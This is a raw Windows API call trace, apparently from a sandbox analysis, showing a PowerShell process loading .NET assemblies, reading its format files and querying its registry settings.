	[0351.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0351.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0351.738] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xa70aa117, Data2=0xc4ff, Data3=0x44a1, Data4=([0]=0x8b, [1]=0xc1, [2]=0xf4, [3]=0xd7, [4]=0xb2, [5]=0xe0, [6]=0x9f, [7]=0xad))) returned 0x0
	[0351.743] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x8cd3f899, Data2=0xe688, Data3=0x4a19, Data4=([0]=0x80, [1]=0x2c, [2]=0x45, [3]=0xa0, [4]=0x40, [5]=0x4a, [6]=0xb5, [7]=0xd7))) returned 0x0
	[0351.744] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x8d01240a, Data2=0xe89a, Data3=0x4f35, Data4=([0]=0xb9, [1]=0xe, [2]=0xd7, [3]=0x87, [4]=0xaf, [5]=0xf1, [6]=0x4e, [7]=0xad))) returned 0x0
	[0351.744] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x49528ce2, Data2=0xa6cb, Data3=0x4e6b, Data4=([0]=0x9b, [1]=0x5f, [2]=0x6, [3]=0x2a, [4]=0xc5, [5]=0x87, [6]=0xc1, [7]=0xa9))) returned 0x0
	[0351.745] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x88b1bad4, Data2=0x200a, Data3=0x4c4d, Data4=([0]=0x8a, [1]=0xa2, [2]=0x78, [3]=0xcb, [4]=0x45, [5]=0x7, [6]=0xa2, [7]=0x39))) returned 0x0
	[0351.745] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x4cbbfb44, Data2=0x97e0, Data3=0x4939, Data4=([0]=0xa1, [1]=0xab, [2]=0x3e, [3]=0x33, [4]=0x97, [5]=0x26, [6]=0x32, [7]=0xc9))) returned 0x0
	[0351.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0351.746] SetErrorMode (uMode=0x1) returned 0x1
	[0351.746] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0351.746] GetFileType (hFile=0x32c) returned 0x1
	[0351.746] SetErrorMode (uMode=0x1) returned 0x1
	[0351.746] GetFileType (hFile=0x32c) returned 0x1
	[0351.746] ReadFile (in: hFile=0x32c, lpBuffer=0x3418fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3418fb8*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0351.747] ReadFile (in: hFile=0x32c, lpBuffer=0x3418fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3418fb8*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0351.748] ReadFile (in: hFile=0x32c, lpBuffer=0x3418fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3418fb8*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0351.748] ReadFile (in: hFile=0x32c, lpBuffer=0x3418fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3418fb8*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0351.748] ReadFile (in: hFile=0x32c, lpBuffer=0x3418fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3418fb8*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0351.749] ReadFile (in: hFile=0x32c, lpBuffer=0x3418fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3418fb8*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0351.749] ReadFile (in: hFile=0x32c, lpBuffer=0x3418fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3418fb8*, lpNumberOfBytesRead=0x10cdf8*=0xaca, lpOverlapped=0x0) returned 1
	[0351.749] ReadFile (in: hFile=0x32c, lpBuffer=0x34185ea, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34185ea*, lpNumberOfBytesRead=0x10cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0351.749] ReadFile (in: hFile=0x32c, lpBuffer=0x3418fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3418fb8*, lpNumberOfBytesRead=0x10cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0351.749] CloseHandle (hObject=0x32c) returned 1
	[0351.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0351.749] SetErrorMode (uMode=0x1) returned 0x1
	[0351.749] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10cda0 | out: lpFileInformation=0x10cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0351.749] SetErrorMode (uMode=0x1) returned 0x1
	[0351.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0351.749] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10ce88 | out: phkResult=0x10ce88*=0x32c) returned 0x0
	[0351.750] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10ce0c, lpData=0x0, lpcbData=0x10ce08*=0x0 | out: lpType=0x10ce0c*=0x1, lpData=0x0, lpcbData=0x10ce08*=0x56) returned 0x0
	[0351.750] CoTaskMemAlloc (cb=0x5a) returned 0x3a3a70
	[0351.750] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10cddc, lpData=0x3a3a70, lpcbData=0x10cdd8*=0x56 | out: lpType=0x10cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10cdd8*=0x56) returned 0x0
	[0351.750] CoTaskMemFree (pv=0x3a3a70) 
	[0351.750] RegCloseKey (hKey=0x32c) returned 0x0
	[0351.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0351.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0351.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0351.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0351.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0351.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0352.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0352.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0352.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0352.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0352.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0352.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0352.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0352.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0352.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0352.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0352.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0352.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0352.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0352.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0352.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.216] VirtualQuery (in: lpAddress=0x10b920, lpBuffer=0x10c7e0, dwLength=0x30 | out: lpBuffer=0x10c7e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.219] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x8ff63926, Data2=0xbcf, Data3=0x441b, Data4=([0]=0xbc, [1]=0xdc, [2]=0x3d, [3]=0x43, [4]=0x95, [5]=0x27, [6]=0x47, [7]=0x42))) returned 0x0
	[0353.219] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x909544f8, Data2=0xe912, Data3=0x480e, Data4=([0]=0x9f, [1]=0x28, [2]=0x10, [3]=0xcb, [4]=0x3b, [5]=0x7a, [6]=0x52, [7]=0x9f))) returned 0x0
	[0353.220] VirtualQuery (in: lpAddress=0x10bad0, lpBuffer=0x10c990, dwLength=0x30 | out: lpBuffer=0x10c990*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.221] VirtualQuery (in: lpAddress=0x10bad0, lpBuffer=0x10c990, dwLength=0x30 | out: lpBuffer=0x10c990*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.222] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x7ba86f90, Data2=0x1d3d, Data3=0x4f9f, Data4=([0]=0xa9, [1]=0x9, [2]=0xb3, [3]=0x1e, [4]=0xdf, [5]=0x1a, [6]=0x16, [7]=0x96))) returned 0x0
	[0353.225] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0x1a65f54a, Data2=0x2356, Data3=0x44be, Data4=([0]=0xbe, [1]=0x4f, [2]=0x7f, [3]=0x64, [4]=0x56, [5]=0xc3, [6]=0xb2, [7]=0x21))) returned 0x0
	[0353.225] VirtualQuery (in: lpAddress=0x10bd20, lpBuffer=0x10cbe0, dwLength=0x30 | out: lpBuffer=0x10cbe0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.226] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.226] VirtualQuery (in: lpAddress=0x10ba60, lpBuffer=0x10c920, dwLength=0x30 | out: lpBuffer=0x10c920*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.227] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xffa07745, Data2=0x39d6, Data3=0x48c5, Data4=([0]=0xa1, [1]=0xa, [2]=0xfe, [3]=0xa6, [4]=0xb1, [5]=0xa6, [6]=0x65, [7]=0xc2))) returned 0x0
	[0353.227] VirtualQuery (in: lpAddress=0x10bd20, lpBuffer=0x10cbe0, dwLength=0x30 | out: lpBuffer=0x10cbe0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.227] VirtualQuery (in: lpAddress=0x10bb40, lpBuffer=0x10ca00, dwLength=0x30 | out: lpBuffer=0x10ca00*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.227] VirtualQuery (in: lpAddress=0x10b390, lpBuffer=0x10c250, dwLength=0x30 | out: lpBuffer=0x10c250*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.227] VirtualQuery (in: lpAddress=0x10b390, lpBuffer=0x10c250, dwLength=0x30 | out: lpBuffer=0x10c250*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.228] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xa6bf9ec1, Data2=0xaa3, Data3=0x4ca9, Data4=([0]=0x87, [1]=0x62, [2]=0x6b, [3]=0x50, [4]=0xb8, [5]=0xe0, [6]=0x4f, [7]=0x1))) returned 0x0
	[0353.228] CoCreateGuid (in: pguid=0x10d0b0 | out: pguid=0x10d0b0*(Data1=0xd38ac209, Data2=0x93dc, Data3=0x47e6, Data4=([0]=0x9b, [1]=0xa0, [2]=0x9f, [3]=0x61, [4]=0xbf, [5]=0xc1, [6]=0x73, [7]=0xed))) returned 0x0
	[0353.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0353.228] SetErrorMode (uMode=0x1) returned 0x1
	[0353.228] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0353.228] GetFileType (hFile=0x32c) returned 0x1
	[0353.228] SetErrorMode (uMode=0x1) returned 0x1
	[0353.228] GetFileType (hFile=0x32c) returned 0x1
	[0353.228] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.230] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.230] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.230] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.231] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.231] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.231] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.231] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.232] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0353.232] ReadFile (in: hFile=0x32c, lpBuffer=0x34cb5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cdf8, lpOverlapped=0x0 | out: lpBuffer=0x34cb5b0*, lpNumberOfBytesRead=0x10cdf8*=0x1000, lpOverlapped=0x0) returned 1
